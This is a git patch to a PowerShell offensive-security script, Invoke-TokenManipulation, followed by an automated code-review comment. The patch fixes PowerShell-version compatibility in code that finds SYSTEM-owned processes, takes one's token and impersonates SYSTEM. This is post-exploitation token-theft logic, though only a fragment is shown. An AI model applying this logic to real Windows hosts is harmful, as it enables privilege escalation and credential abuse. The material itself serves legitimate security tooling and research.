From f305e31cf56ced7941ccbd7864a3f372037dc91c Mon Sep 17 00:00:00 2001
From: Matt Graeber
Date: Thu, 10 Mar 2016 16:48:37 -0800
Subject: Bugfix: Invoke-TokenManipulation. Issue #112

Fixed the PSv4 dependency for obtaining process ownership information. Thanks to @mmashwani for suggesting the WMI solution.
---
 Exfiltration/Invoke-TokenManipulation.ps1 | 25 +++++++++++++++++++------
 1 file changed, 19 insertions(+), 6 deletions(-)

diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1
index ea30952..6558a63 100644
--- a/Exfiltration/Invoke-TokenManipulation.ps1
+++ b/Exfiltration/Invoke-TokenManipulation.ps1
@@ -1686,20 +1686,33 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges. #We need to enumrate all processes running as SYSTEM and find one that we can use. [string]$LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value - $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq $LocalSystemNTAccount} + + $SystemTokens = Get-WmiObject -Class Win32_Process | ForEach-Object { + $OwnerInfo = $_.GetOwner() + + if ($OwnerInfo.Domain -and $OwnerInfo.User) { + $OwnerString = "$($OwnerInfo.Domain)\$($OwnerInfo.User)".ToUpper() + + if ($OwnerString -eq $LocalSystemNTAccount.ToUpper()) { + $_ + } + } + } + ForEach ($SystemToken in $SystemTokens) { - $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue + $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.ProcessId -WarningAction SilentlyContinue -ErrorAction SilentlyContinue + if ($SystemTokenInfo) { break } } - if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) + if ($SystemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken))) { Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens" } - if ($systemTokenInfo -ne $null -and $systemTokenInfo.hProcToken -ne [IntPtr]::Zero) + if ($SystemTokenInfo -ne $null -and $SystemTokenInfo.hProcToken -ne [IntPtr]::Zero) { - $CloseHandle.Invoke($systemTokenInfo.hProcToken) | Out-Null - $systemTokenInfo = $null + $CloseHandle.Invoke($SystemTokenInfo.hProcToken) | Out-Null + $SystemTokenInfo = $null } $ProcessIds = get-process | where {$_.name -inotmatch "^csrss$" 
-and $_.name -inotmatch "^system$" -and $_.id -ne 0}
-- 
cgit v1.2.3
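Review bot: The new Get-WmiObject/ForEach-Object block that replaces `Get-Process -IncludeUserName` carries no comment saying why the slower WMI route is taken; the commit message gives the reason (the `-IncludeUserName` switch needs PowerShell 4), so it belongs in the code, e.g. `# Get-Process -IncludeUserName requires PowerShell 4+; resolve owners through Win32_Process.GetOwner() so the PSv2/3 path keeps working`. The `.ToUpper()` calls on both sides of the `-eq` are redundant, since PowerShell's `-eq` is already case-insensitive for strings, so `if ($OwnerString -eq $LocalSystemNTAccount) {` behaves the same and reads cleaner. The rename to `$SystemTokenInfo` is incomplete: the added `if ($SystemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))` still reads `$systemTokenInfo.hProcToken` in the old casing, which works only because variable names are case-insensitive and defeats the point of the cleanup. Get-WmiObject is absent from PowerShell 6+ (Get-CimInstance is its replacement), which is worth a note next to the call if the script is expected to run there. The enclosing function begins and continues outside this hunk.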